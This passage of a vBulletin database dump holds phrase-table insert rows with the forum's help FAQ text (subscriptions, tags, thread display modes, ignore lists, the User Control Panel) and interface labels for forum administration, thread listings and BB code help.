  • Instant Email Notification - sends an email as soon as a new post is added to the thread. This is not sent for every reply and will only be sent once until you revisit the forums.
  • \r\n
\r\n\r\n

How do I manage Subscriptions and Folders?

\r\n\r\n

Thread subscriptions can be sorted into folders for easy management. You can create as many folders as you wish by going to \'Edit Folders\' in the \'Subscribed Threads\' section of your User CP. To add a new folder, enter the folder name into one of the blank boxes and save the page. To delete a folder, delete the folder name. Editing a folder is done by simply editing the folder name in the list.

\r\n\r\n

You can also manage your individual subscriptions by clicking \'List Subscriptions\' under \'Subscribed Threads\' in your User CP. Here you can select which subscriptions you wish to manage and delete them, move them to another folder, or change their subscription type.

\r\n\r\n

Forum subscriptions are not managed through the List Subscriptions page and are shown on the User CP page where they contain the option to unsubscribe from the forum.

', 'vbulletin', 'vBulletin Solutions', 1207146385, '3.7.0 Release Candidate 3'), (35077, -1, 'vb3_tags', 'faqtext', '

What are tags?

\r\n\r\n

Tags are a useful way to search for threads with similar subject matter and content. This complements the normal search system, which searches only for certain words or phrases and/or posts by specific users.

\r\n\r\n

To use tags, you add words or phrases to threads to help describe the content. For instance, if the subject matter is \'photography\' then you can add the tag \'photography\' to the tag list. But you could also add tags like \'digital image\', and \'camera\' (depending, of course, on the nature of the thread).

\r\n\r\n

This will categorize this thread with all other threads that have matching tags, whether or not they have the word \'photography\' in them.

\r\n\r\n

Who adds the tags?

\r\n\r\n

Tags are initially added to threads by the user who started the thread. Other users may also be able to add and remove tags.

\r\n\r\n

How do I use tags?

\r\n\r\n

Tags are displayed in a box near the bottom of a thread page. Clicking on a tag will allow you to view other threads that have the same tag - and which may be related. Clicking on the word \'Tags\' in the top of the box will take you to an overview page with a \'tag cloud.\'

\r\n\r\n

This cloud allows you to see which tags are the most popular - the larger the word, the more times it has been used on threads within the board. There is also another tag cloud on the advanced search page that shows you the tags that have been searched for (or clicked on) the most.

', 'vbulletin', 'vBulletin Solutions', 1215708585, '3.8.0 Alpha 1'), (35078, -1, 'vb3_thread_display', 'faqtext', '

Can I change the order of posts?

\r\n\r\n

You have a choice over how you view threads. When you\'re in a thread, look at the top bar. On the right hand side you\'ll see \'Display Mode\'. Click on this and it lets you change how posts are ordered.

\r\n\r\n

You have three choices:

\r\n\r\n

Linear Mode - posts are displayed chronologically, usually from oldest to newest. Posts are shown in a flat mode so that many posts can be viewed simultaneously. It is possible to change the ordering by changing your preferences in the User CP

\r\n\r\n

Threaded Mode - a tree is shown along with every post. This shows you the relationship each post has to the others. It\'s easy to see who responded to whom. Only one post is shown at a time. By clicking on a single post in the post tree, the page will show that post and all posts made in response to it.

\r\n\r\n

Hybrid Mode - This is a mixture of the linear and threaded modes. The post tree is displayed as in the threaded mode, but many posts are shown at the same time as in the linear modes.

', 'vbulletin', 'vBulletin Solutions', 1248797392, '3.8.3'), (35079, -1, 'vb3_thread_tools', 'faqtext', '

What are thread tools?

\r\n\r\n

At the top of each thread, there is a link called \'Thread Tools\'. By clicking on this link, a menu will appear with a number of options:

\r\n\r\n
    \r\n
  • Show Printable Version - this will show you a page with the thread post content in a reduced graphics format that is more \'printer friendly\'.
  • \r\n
  • Email this Page - if you think the thread may be interesting to someone else, you can forward a link to it to their email address.
  • \r\n
  • Subscribe (or Unsubscribe) from this Thread - by subscribing to a thread, you will receive periodic email updates on recent activity within it. Click here for more information on subscriptions.
  • \r\n
  • Adding a Poll - if you started the thread, you can add a poll to it with this option. Click here for more information on polls.
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1207317565, '3.7.0 Release Candidate 3'), (35080, -1, 'vb3_troublesome_users', 'faqtext', '

Can I block posts, emails and messages from specific users?

\r\n\r\n

If there are particular members that bother you and you do not want to see their posts or receive Private Messages and Emails from them, then you can add these members to your \'Ignore List\'. There are several ways to do this:

\r\n\r\n

Through your User Control Panel: User CP, Settings & Options, Edit Ignore List. Then, type their name into the empty text box and click \'Okay\'.

\r\n\r\n

What if I see something offensive?

\r\n\r\n

You will find \'Report\' links in many places throughout the board. These links allow you to alert the board staff to anything which you find to be offensive, objectionable or illegal.

', 'vbulletin', 'vBulletin Solutions', 1220901022, '3.8.0 Alpha 1'), (35081, -1, 'vb3_user_cp', 'faqtext', '

The User Control Panel (also known as the User CP) is where you control your personal settings, options and preferences. To visit the User CP, you must have first registered on the forums. Once logged in, click on \'User CP\' in the header bar near the top of the page.

\r\n\r\n

The User CP main page will list any new notifications, including new private messages and pending friend requests. Additional pages and forms allow you to control:

\r\n\r\n
    \r\n
  • Your email address and password
  • \r\n
  • Custom public profile settings
  • \r\n
  • Private messages
  • \r\n
  • Subscribed threads and forums
  • \r\n
  • Contacts and friends
  • \r\n
  • Social groups
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1207146429, '3.7.0 Release Candidate 3'), (35082, -1, 'vb3_user_profile', 'faqtext', '', 'vbulletin', 'vBulletin Solutions', 1204554097, '3.7.0 Beta 6'), (35083, -1, 'vb3_albums', 'faqtitle', 'Albums and Pictures', 'vbulletin', 'vBulletin Solutions', 1204557136, '3.7.0 Beta 6'), (35084, -1, 'vb3_announcements', 'faqtitle', 'Announcements', 'vbulletin', 'vBulletin Solutions', 1204551344, '3.7.0 Beta 6'), (35085, -1, 'vb3_attachments', 'faqtitle', 'Attachments and Images', 'vbulletin', 'vBulletin Solutions', 1204566036, '3.7.0 Beta 6'), (35086, -1, 'vb3_board_faq', 'faqtitle', 'Board FAQ', 'vbulletin', 'vBulletin Solutions', 1204806694, '3.7.0 Beta 6'), (35087, -1, 'vb3_board_usage', 'faqtitle', 'General Forum Usage', 'vbulletin', 'vBulletin Solutions', 1228216516, '3.8.0 Release Candidate 1'), (35088, -1, 'vb3_calendar', 'faqtitle', 'Calendars', 'vbulletin', 'vBulletin Solutions', 1204551511, '3.7.0 Beta 6'), (35089, -1, 'vb3_changing_details', 'faqtitle', 'Changing User Details', 'vbulletin', 'vBulletin Solutions', 1204553874, '3.7.0 Beta 6'), (35090, -1, 'vb3_contact_members', 'faqtitle', 'Contacting other Members', 'vbulletin', 'vBulletin Solutions', 1204557826, '3.7.0 Beta 6'), (35091, -1, 'vb3_cookies', 'faqtitle', 'Cookies', 'vbulletin', 'vBulletin Solutions', 1204551478, '3.7.0 Beta 6'), (35092, -1, 'vb3_editing_deleting', 'faqtitle', 'Editing and Deleting your Posts', 'vbulletin', 'vBulletin Solutions', 1204559380, '3.7.0 Beta 6'), (35093, -1, 'vb3_forums_threads_posts', 'faqtitle', 'Forums, Threads and Posts', 'vbulletin', 'vBulletin Solutions', 1204566267, '3.7.0 Beta 6'), (35094, -1, 'vb3_friends_contacts', 'faqtitle', 'Friends and Contacts', 'vbulletin', 'vBulletin Solutions', 1204556826, '3.7.0 Beta 6'), (35095, -1, 'vb3_lost_passwords', 'faqtitle', 'Lost Passwords', 'vbulletin', 'vBulletin Solutions', 1204551494, '3.7.0 Beta 6'), (35096, -1, 'vb3_members_list', 'faqtitle', 'Members List', 'vbulletin', 'vBulletin Solutions', 1204565873, '3.7.0 Beta 6'), (35097, -1, 'vb3_message_icons', 'faqtitle', 'Message Icons and Thread Prefixes', 'vbulletin', 'vBulletin Solutions', 1204553702, '3.7.0 Beta 6'), (35098, -1, 'vb3_mods_admins', 'faqtitle', 'Moderators and Administrators', 'vbulletin', 'vBulletin Solutions', 1204559411, '3.7.0 Beta 6'), (35099, -1, 'vb3_new_posts', 'faqtitle', 'Viewing New Posts or Today\'s Posts', 'vbulletin', 'vBulletin Solutions', 1204557689, '3.7.0 Beta 6'), (35100, -1, 'vb3_notifications', 'faqtitle', 'Your Notifications', 'vbulletin', 'vBulletin Solutions', 1204566343, '3.7.0 Beta 6'), (35101, -1, 'vb3_other_settings', 'faqtitle', 'Other Settings and Options', 'vbulletin', 'vBulletin Solutions', 1204556807, '3.7.0 Beta 6'), (35102, -1, 'vb3_polls', 'faqtitle', 'Creating and Participating in Polls', 'vbulletin', 'vBulletin Solutions', 1204552685, '3.7.0 Beta 6'), (35103, -1, 'vb3_posting', 'faqtitle', 'Posting New Messages', 'vbulletin', 'vBulletin Solutions', 1204804551, '3.7.0 Beta 6'), (35104, -1, 'vb3_private_messages', 'faqtitle', 'Private Messages', 'vbulletin', 'vBulletin Solutions', 1204553944, '3.7.0 Beta 6'), (35105, -1, 'vb3_profile_custom', 'faqtitle', 'Profile Page Customization', 'vbulletin', 'vBulletin Solutions', 1204566004, '3.7.0 Beta 6'), (35106, -1, 'vb3_public_profile', 'faqtitle', 'My Public Profile', 'vbulletin', 'vBulletin Solutions', 1204565979, '3.7.0 Beta 6'), (35107, -1, 'vb3_quick_links', 'faqtitle', 'Quick Links', 'vbulletin', 'vBulletin Solutions', 1204551562, '3.7.0 Beta 6'), (35108, -1, 'vb3_rating_threads', 'faqtitle', 'Rating Threads', 'vbulletin', 'vBulletin Solutions', 1204551428, '3.7.0 Beta 6'), (35109, -1, 'vb3_reading_posting', 'faqtitle', 'Reading and Posting Messages', 'vbulletin', 'vBulletin Solutions', 1204552547, '3.7.0 Beta 6'), (35110, -1, 'vb3_register', 'faqtitle', 'Registration', 'vbulletin', 'vBulletin Solutions', 1204551275, '3.7.0 Beta 6'), (35111, -1, 'vb3_replying', 'faqtitle', 'Replying to a Post', 'vbulletin', 'vBulletin Solutions', 1208717872, '3.7.0 Release Candidate 4'), (35112, -1, 'vb3_reputation', 'faqtitle', 'Reputation', 'vbulletin', 'vBulletin Solutions', 1204552519, '3.7.0 Beta 6'), (35113, -1, 'vb3_rss_podcasting', 'faqtitle', 'RSS and Podcasting', 'vbulletin', 'vBulletin Solutions', 1204557897, '3.7.0 Beta 6'), (35114, -1, 'vb3_search', 'faqtitle', 'Searching Forums and Threads', 'vbulletin', 'vBulletin Solutions', 1204565825, '3.7.0 Beta 6'), (35115, -1, 'vb3_signatures_avatars', 'faqtitle', 'Signatures, Avatars and Profile Pictures', 'vbulletin', 'vBulletin Solutions', 1204553831, '3.7.0 Beta 6'), (35116, -1, 'vb3_smilies', 'faqtitle', 'Smilies', 'vbulletin', 'vBulletin Solutions', 1204559402, '3.7.0 Beta 6'), (35117, -1, 'vb3_social_groups', 'faqtitle', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1204566425, '3.7.0 Beta 6'), (35118, -1, 'vb3_subscriptions', 'faqtitle', 'Subscriptions', 'vbulletin', 'vBulletin Solutions', 1204557173, '3.7.0 Beta 6'), (35119, -1, 'vb3_tags', 'faqtitle', 'Tags', 'vbulletin', 'vBulletin Solutions', 1204551462, '3.7.0 Beta 6'), (35120, -1, 'vb3_thread_display', 'faqtitle', 'Thread Display Options', 'vbulletin', 'vBulletin Solutions', 1248797392, '3.8.3'), (35121, -1, 'vb3_thread_tools', 'faqtitle', 'Thread Tools', 'vbulletin', 'vBulletin Solutions', 1204551446, '3.7.0 Beta 6'), (35122, -1, 'vb3_troublesome_users', 'faqtitle', 'Dealing with Troublesome Users', 'vbulletin', 'vBulletin Solutions', 1204557885, '3.7.0 Beta 6'), (35123, -1, 'vb3_user_cp', 'faqtitle', 'The User Control Panel', 'vbulletin', 'vBulletin Solutions', 1204551823, '3.7.0 Beta 6'), (35124, -1, 'vb3_user_profile', 'faqtitle', 'User Profile Features', 'vbulletin', 'vBulletin Solutions', 1204554097, '3.7.0 Beta 6'), (35125, -1, 'access_options', 'forum', 'Access Options', 'vbulletin', '', 0, ''), (35126, -1, 'act_as_forum', 'forum', 'Act as Forum (Will act as category if no)', 'vbulletin', '', 0, ''), (35127, -1, 'add_announcement', 'forum', 'Add Announcement', 'vbulletin', '', 0, ''), (35128, -1, 'add_child_forum', 'forum', 'Add Child Forum', 'vbulletin', '', 0, ''), (35129, -1, 'add_moderator', 'forum', 'Add Moderator', 'vbulletin', '', 0, ''), (35130, -1, 'add_new_forum', 'forum', 'Add New Forum', 'vbulletin', '', 0, ''), (35131, -1, 'allow_icons', 'forum', 'Allow Post Icons', 'vbulletin', '', 0, ''), (35132, -1, 'allow_thread_ratings_in_this_forum', 'forum', 'Allow Thread Ratings in this Forum', 'vbulletin', '', 0, ''), (35133, -1, 'apply_password_to_children', 'forum', 'Apply This Password to Child Forums (Only if changed)', 'vbulletin', '', 0, ''), (35134, -1, 'are_you_sure_want_to_delete_forum_x', 'forum', 'Are you sure you want to delete the forum called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (35135, -1, 'are_you_sure_you_want_to_delete_this_forum', 'forum', 'Are you sure you want to delete this forum? Note that any sub-forums will also be deleted!', 'vbulletin', '', 0, ''), (35136, -1, 'can_have_password', 'forum', 'Can Have Password (Setting this to no will prevent a password from being inherited and from being set by moderators)
(Note: You may still set a password manually)
', 'vbulletin', '', 0, ''), (35137, -1, 'category', 'forum', 'Category', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35138, -1, 'count_posts_in_forum', 'forum', 'Count Posts Made in this Forum Towards User Post Counts', 'vbulletin', '', 0, ''), (35139, -1, 'create_forum_based_off_of_forum', 'forum', 'Create Forum Based off of Forum:', 'vbulletin', '', 0, ''), (35140, -1, 'custom_forum_style', 'forum', 'Custom Style for this Forum', 'vbulletin', '', 0, ''), (35141, -1, 'default_sort_field', 'forum', 'Default Sort Field', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35142, -1, 'default_sort_order', 'forum', 'Default Sort Order', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35143, -1, 'delete_forum', 'forum', 'Delete Forum', 'vbulletin', '', 0, ''), (35144, -1, 'do_not_change_usergroup', 'forum', 'DO NOT CHANGE USERGROUP', 'vbulletin', '', 0, ''), (35145, -1, 'edit_display_order', 'forum', 'Edit Display Order', 'vbulletin', '', 0, ''), (35146, -1, 'edit_forum', 'forum', 'Edit Forum', 'vbulletin', '', 0, ''), (35147, -1, 'edit_password', 'forum', 'Edit Password', 'vbulletin', '', 0, ''), (35148, -1, 'emails_to_notify_when_post', 'forum', 'Email Addresses to Notify When there is a New Post (Separate each address with a SPACE)', 'vbulletin', '', 0, ''), (35149, -1, 'emails_to_notify_when_thread', 'forum', 'Email Addresses to Notify When there is a New Thread (Separate each address with a SPACE)', 'vbulletin', '', 0, ''), (35150, -1, 'empty_forums', 'forum', 'Empty Forums', 'vbulletin', '', 0, ''), (35151, -1, 'expand', 'forum', 'Expand', 'vbulletin', '', 0, ''), (35152, -1, 'explicit', 'forum', 'Explicit', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35153, -1, 'forum_is_active', 'forum', 'Forum is Active (Will not appear if set to no, but remains accessible if the forum\'s URL is known)', 'vbulletin', '', 0, ''), (35154, -1, 'forum_link', 'forum', 'Forum Link (Entering a URL here will cause anyone clicking the forum link to be redirected to that URL)', 'vbulletin', '', 0, ''), (35155, -1, 'forum_manager', 'forum', 'Forum Manager', 'vbulletin', '', 0, ''), (35156, -1, 'forum_open', 'forum', 'Forum is Open (Set this to \'No\' to prevent any new posts being made in this forum)', 'vbulletin', '', 0, ''), (35157, -1, 'forum_password', 'forum', 'Forum Password (Optional: This acts in addition to any other permissions set for this forum)', 'vbulletin', '', 0, ''), (35158, -1, 'forums_marked_asterisk_are_password_protected', 'forum', 'Forums Marked * are Password-Protected', 'vbulletin', '', 0, ''), (35159, -1, 'image_url', 'forum', 'Image URLMinimum 300x300. Must be .jpg or .png', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35160, -1, 'index_new_posts', 'forum', 'Index New Posts in Search Engine (Setting this to \'No\' will prevent anyone from being able to search in this forum)', 'vbulletin', '', 0, ''), (35161, -1, 'keywords', 'forum', 'KeywordsSeparate with commas', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35162, -1, 'link', 'forum', 'Link', 'vbulletin', '', 0, ''), (35163, -1, 'list_moderators', 'forum', 'List Moderators', 'vbulletin', '', 0, ''), (35164, -1, 'media_author', 'forum', 'Media Author', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35165, -1, 'moderate_attachments', 'forum', 'Moderate Attachments', 'vbulletin', '', 0, ''), (35166, -1, 'moderate_posts', 'forum', 'Moderate Posts', 'vbulletin', '', 0, ''), (35167, -1, 'moderate_threads', 'forum', 'Moderate Threads', 'vbulletin', '', 0, ''), (35168, -1, 'moderation_options', 'forum', 'Moderation Options', 'vbulletin', '', 0, ''), (35169, -1, 'override_style_choice', 'forum', 'Override Users\' Style Choice (If this forum uses a custom style, this will force users with a different style choice to see the forum with the style you specified)', 'vbulletin', 'vBulletin Solutions', 1185224495, '3.6.8'), (35170, -1, 'owner_email', 'forum', 'Owner Email', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35171, -1, 'owner_name', 'forum', 'Owner Name', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35172, -1, 'pda', 'forum', 'PDA', 'vbulletin', '', 0, ''), (35173, -1, 'please_select_forum', 'forum', 'Please select a forum', 'vbulletin', '', 0, ''), (35174, -1, 'podcast_settings', 'forum', 'Podcast Settings', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35175, -1, 'posting_options', 'forum', 'Posting Options', 'vbulletin', '', 0, ''), (35176, -1, 'prefix_for_forum_status_images', 'forum', 'Prefix for Forum Status Images\r\n(This prefix will be used on status image filenames for a forum, it can only contain A-Z, 0-9, -, _, . and /)', 'vbulletin', 'vBulletin Solutions', 1213632199, '3.8.0 Alpha 1'), (35177, -1, 'require_moderator_validation_before_new_attachments_are_displayed', 'forum', 'Require moderator validation before new attachments are displayed', 'vbulletin', '', 0, ''), (35178, -1, 'require_moderator_validation_before_new_posts_are_displayed', 'forum', 'Require moderator validation before new posts are displayed', 'vbulletin', '', 0, ''), (35179, -1, 'require_moderator_validation_before_new_threads_are_displayed', 'forum', 'Require moderator validation before new threads are displayed', 'vbulletin', '', 0, ''), (35180, -1, 'require_threads_have_prefix', 'forum', 'Require Threads to have a Prefix', 'vbulletin', 'vBulletin Solutions', 1190043626, '3.7.0 Beta 1'), (35181, -1, 'show_all_threads', 'forum', 'Show all threads', 'vbulletin', '', 0, ''), (35182, -1, 'show_forum_on_forum_jump', 'forum', 'Show this Forum and Child Forums on the Forum Jump Menu', 'vbulletin', '', 0, ''), (35183, -1, 'show_private_forum', 'forum', 'Show Private Forum(Select \'No\' here to hide this forum from users who are not allowed to access it. Users who do have permission to access it will have to log in before they can see this forum.
This option applies to any forum listing, including the Forum Jump menu, and Search Results.
Selecting \'Use default\' will use the system default as defined in Forum Listings Display Options.)
', 'vbulletin', 'vBulletin Solutions', 1194862893, '3.7.0 Beta 1'), (35184, -1, 'style_options', 'forum', 'Style Options', 'vbulletin', '', 0, ''), (35185, -1, 'subtitle', 'forum', 'Subtitle', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35186, -1, 'summary', 'forum', 'Summary', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35187, -1, 'use_default', 'forum', 'Use Default', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35188, -1, 'use_default_style', 'forum', 'Use Default Style', 'vbulletin', '', 0, ''), (35189, -1, 'use_selected_prefix_sets', 'forum', 'Use Selected Prefix Sets', 'vbulletin', 'vBulletin Solutions', 1190043606, '3.7.0 Beta 1'), (35190, -1, 'view_forum', 'forum', 'View Forum', 'vbulletin', '', 0, ''), (35191, -1, 'view_full_version', 'forum', 'View Full Version', 'vbulletin', '', 0, ''), (35192, -1, 'view_permissions', 'forum', 'View Permissions', 'vbulletin', '', 0, ''), (35193, -1, 'x_replies', 'forum', '{1} replies', 'vbulletin', '', 0, ''), (35194, -1, 'yes_display_post_counts', 'forum', 'Yes - Display Post Counts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35195, -1, 'yes_hide_post_counts', 'forum', 'Yes - Hide Post Counts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35196, -1, 'add_moderator', 'forumdisplay', 'Add Moderator', 'vbulletin', '', 0, ''), (35197, -1, 'admin_tools', 'forumdisplay', 'Admin Tools', 'vbulletin', 'vBulletin Solutions', 1147889553, '3.6.0 Beta 1'), (35198, -1, 'ascending', 'forumdisplay', 'Ascending', 'vbulletin', '', 0, ''), (35199, -1, 'beginning', 'forumdisplay', 'Beginning', 'vbulletin', '', 0, ''), (35200, -1, 'descending', 'forumdisplay', 'Descending', 'vbulletin', '', 0, ''), (35201, -1, 'expires_on_x_y', 'forumdisplay', 'Expires on {1} at {2}', 'vbulletin', 'vBulletin Solutions', 1151452217, '3.6.0 Beta 4'), (35202, -1, 'forum_tools', 'forumdisplay', 'Forum Tools', 'vbulletin', '', 0, ''), (35203, -1, 'from_the', 'forumdisplay', 'From The', 'vbulletin', '', 0, ''), (35204, -1, 'hot_thread_with_new_posts', 'forumdisplay', 'Hot thread with new posts', 'vbulletin', '', 0, ''), (35205, -1, 'hot_thread_with_no_new_posts', 'forumdisplay', 'Hot thread with no new posts', 'vbulletin', '', 0, ''), (35206, -1, 'last_100_days', 'forumdisplay', 'Last 100 Days', 'vbulletin', '', 0, ''), (35207, -1, 'last_10_days', 'forumdisplay', 'Last 10 Days', 'vbulletin', '', 0, ''), (35208, -1, 'last_2_days', 'forumdisplay', 'Last 2 Days', 'vbulletin', '', 0, ''), (35209, -1, 'last_2_months', 'forumdisplay', 'Last 2 Months', 'vbulletin', '', 0, ''), (35210, -1, 'last_2_weeks', 'forumdisplay', 'Last 2 Weeks', 'vbulletin', '', 0, ''), (35211, -1, 'last_45_days', 'forumdisplay', 'Last 45 Days', 'vbulletin', '', 0, ''), (35212, -1, 'last_75_days', 'forumdisplay', 'Last 75 Days', 'vbulletin', '', 0, ''), (35213, -1, 'last_day', 'forumdisplay', 'Last Day', 'vbulletin', '', 0, ''), (35214, -1, 'last_month', 'forumdisplay', 'Last Month', 'vbulletin', '', 0, ''), (35215, -1, 'last_post_time', 'forumdisplay', 'Last Post Time', 'vbulletin', '', 0, ''), (35216, -1, 'last_week', 'forumdisplay', 'Last Week', 'vbulletin', '', 0, ''), (35217, -1, 'last_year', 'forumdisplay', 'Last Year', 'vbulletin', '', 0, ''), (35218, -1, 'mark_this_forum_read', 'forumdisplay', 'Mark This Forum Read', 'vbulletin', '', 0, ''), (35219, -1, 'mass_move', 'forumdisplay', 'Mass Move', 'vbulletin', '', 0, ''), (35220, -1, 'mass_prune', 'forumdisplay', 'Mass Prune', 'vbulletin', '', 0, ''), (35221, -1, 'massmove_threads', 'forumdisplay', 'Mass-Move Threads', 'vbulletin', '', 0, ''), (35222, -1, 'massprune_threads', 'forumdisplay', 'Mass-Prune Threads', 'vbulletin', '', 0, ''), (35223, -1, 'moderation', 'forumdisplay', 'Moderation', 'vbulletin', '', 0, ''), (35224, -1, 'no_posts_in_this_forum', 'forumdisplay', 'There are no posts in this forum.', 'vbulletin', '', 0, ''), (35225, -1, 'no_posts_last_x_days_forum', 'forumdisplay', 'There have been no posts in the last {1} days in this forum.', 'vbulletin', '', 0, ''), (35226, -1, 'post_a_new_thread', 'forumdisplay', 'Post a New Thread', 'vbulletin', '', 0, ''), (35227, -1, 'post_new_announcement', 'forumdisplay', 'Post New Announcement', 'vbulletin', 'vBulletin Solutions', 1142640752, '3.6.0 Beta 1'), (35228, -1, 'post_new_thread', 'forumdisplay', 'Post New Thread', 'vbulletin', '', 0, ''), (35229, -1, 'rating', 'forumdisplay', 'Rating', 'vbulletin', '', 0, ''), (35230, -1, 'search_this_forum', 'forumdisplay', 'Search this Forum', 'vbulletin', '', 0, ''), (35231, -1, 'showing_threads_x_to_y_of_z', 'forumdisplay', 'Showing threads {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925305, '3.7.0 Release Candidate 1'), (35232, -1, 'sort_order', 'forumdisplay', 'Sort Order', 'vbulletin', '', 0, ''), (35233, -1, 'sort_threads_by', 'forumdisplay', 'Sort threads by', 'vbulletin', 'vBulletin Solutions', 1248394357, '3.8.3'), (35234, -1, 'sorted_by', 'forumdisplay', 'Sorted By', 'vbulletin', '', 0, ''), (35235, -1, 'subscribe_to_this_forum', 'forumdisplay', 'Subscribe to This Forum', 'vbulletin', '', 0, ''), (35236, -1, 'thread_contains_a_message_written_by_you', 'forumdisplay', 'Thread Contains a Message Written By You', 'vbulletin', '', 0, ''), (35237, -1, 'thread_is_closed', 'forumdisplay', 'Thread is closed', 'vbulletin', '', 0, ''), (35238, -1, 'thread_rating', 'forumdisplay', 'Thread Rating', 'vbulletin', '', 0, ''), (35239, -1, 'thread_start_time', 'forumdisplay', 'Thread Start Time', 'vbulletin', 'vBulletin Solutions', 1149205117, '3.6.0 Beta 1'), (35240, -1, 'thread_title', 'forumdisplay', 'Thread Title', 'vbulletin', '', 0, ''), (35241, -1, 'threads_in_forum', 'forumdisplay', 'Threads in Forum', 'vbulletin', '', 0, ''), (35242, -1, 'try_controls_below_for_older_pictures', 'forumdisplay', 'Try using the controls below to search for any older pictures that may exist.', 'vbulletin', 'vBulletin Solutions', 1213611360, '3.8.0 Alpha 1'), (35243, -1, 'try_controls_below_for_older_posts', 'forumdisplay', 'Try using the controls below to search for any older posts that may exist.', 'vbulletin', '', 0, ''), (35244, -1, 'view_attachment_queue', 'forumdisplay', 'View Attachment Queue', 'vbulletin', '', 0, ''), (35245, -1, 'view_parent_forum', 'forumdisplay', 'View Parent Forum', 'vbulletin', '', 0, ''), (35246, -1, 'view_posts_queue', 'forumdisplay', 'View Posts Queue', 'vbulletin', '', 0, ''), (35247, -1, 'x_deleted_posts', 'forumdisplay', '{1} Deleted Post(s)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35248, -1, 'x_members_y_guests', 'forumdisplay', '{1} members & {2} guests', 'vbulletin', '', 0, ''), (35249, -1, 'x_moderated_posts', 'forumdisplay', '{1} Moderated Post(s)', 'vbulletin', '', 0, ''), (35250, -1, 'you_have_posted_in_this_thread', 'forumdisplay', 'You have posted in this thread', 'vbulletin', '', 0, ''), (35251, -1, 'advanced_lists', 'fronthelp', 'Advanced Lists', 'vbulletin', '', 0, ''), (35252, -1, 'attach_tag_allows', 'fronthelp', 'The [attach] tag allows you to display an attachment in your post rather than at the bottom. It will only display attachments that belong to the post in which it is utilized.', 'vbulletin', '', 0, ''), (35253, -1, 'attachmentid', 'fronthelp', 'attachmentid', 'vbulletin', '', 0, ''), (35254, -1, 'avatar_list', 'fronthelp', 'Avatar List', 'vbulletin', '', 0, ''), (35255, -1, 'avatars', 'fronthelp', 'Avatars', 'vbulletin', '', 0, ''), (35256, -1, 'avatars_small_images', 'fronthelp', 'Avatars are small graphical images that you may choose in your profile.\r\n They are displayed by your username on all posts that you make.\r\n You can select the image that best describes yourself from your profile options.', 'vbulletin', '', 0, ''), (35257, -1, 'b_i_and_u_tags_allow', 'fronthelp', 'The [b], [i] and [u] tags allow you to create text that is bold, italic and underlined.', 'vbulletin', '', 0, ''), (35258, -1, 'bb_code', 'fronthelp', 'BB Code', 'vbulletin', 'vBulletin Solutions', 1206965085, '3.7.0 Release Candidate 2'), (35259, -1, 'bb_code_based_on_html', 'fronthelp', 'BB code is a set of tags based on the HTML language that you may already be familiar with.\r\n They allow you to add formatting to your messages in the same way as HTML does,\r\n but have a simpler syntax and will never break the layout of the pages you are viewing.\r\n The ability to use BB code is set on a forum-by-forum basis by the administrator,\r\n so you should check the forum rules when you post a new message.
\r\n
\r\n Below is a list of the BB code tags you can use to format your messages.', 'vbulletin', 'vBulletin Solutions', 1206965118, '3.7.0 Release Candidate 2'), (35260, -1, 'bbcode_list', 'fronthelp', 'BB Code List', 'vbulletin', 'vBulletin Solutions', 1195819636, '3.7.0 Beta 1'), (35261, -1, 'bold', 'fronthelp', 'Bold', 'vbulletin', '', 0, ''), (35262, -1, 'bulleted_lists', 'fronthelp', 'Bulleted Lists', 'vbulletin', '', 0, ''), (35263, -1, 'center', 'fronthelp', 'Center', 'vbulletin', '', 0, ''), (35264, -1, 'click_here_to_email_me', 'fronthelp', 'Click Here to Email Me', 'vbulletin', '', 0, ''), (35265, -1, 'click_me', 'fronthelp', 'Click Me!', 'vbulletin', '', 0, ''), (35266, -1, 'code_tag_switches', 'fronthelp', 'The [code] tag switches to a fixed-width (monospace) font and preserves all spacing.', 'vbulletin', '', 0, ''), (35267, -1, 'color', 'fronthelp', 'Color', 'vbulletin', '', 0, ''), (35268, -1, 'color_tag_allows', 'fronthelp', 'The [color] tag allows you to change the color of your text.', 'vbulletin', '', 0, ''), (35269, -1, 'email_linking', 'fronthelp', 'Email Linking', 'vbulletin', '', 0, ''), (35270, -1, 'email_tag_allows', 'fronthelp', 'The [email] tag allows you to link to an email address. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''), (35271, -1, 'example_output', 'fronthelp', 'Example Output', 'vbulletin', '', 0, ''), (35272, -1, 'example_usage', 'fronthelp', 'Example Usage', 'vbulletin', '', 0, ''), (35273, -1, 'faq_item', 'fronthelp', 'FAQ Item', 'vbulletin', '', 0, ''), (35274, -1, 'font', 'fronthelp', 'Font', 'vbulletin', '', 0, ''), (35275, -1, 'font_tag_allows', 'fronthelp', 'The [font] tag allows you to change the font of your text.', 'vbulletin', '', 0, ''), (35276, -1, 'highlight', 'fronthelp', 'Highlight', 'vbulletin', '', 0, ''), (35277, -1, 'highlight_tag_allows', 'fronthelp', 'The [highlight] tag allows you to emphasize your text.', 'vbulletin', '', 0, ''), (35278, -1, 'html_tag_allows', 'fronthelp', 'The [html] tag allows you to perform syntax highlighting for HTML code.', 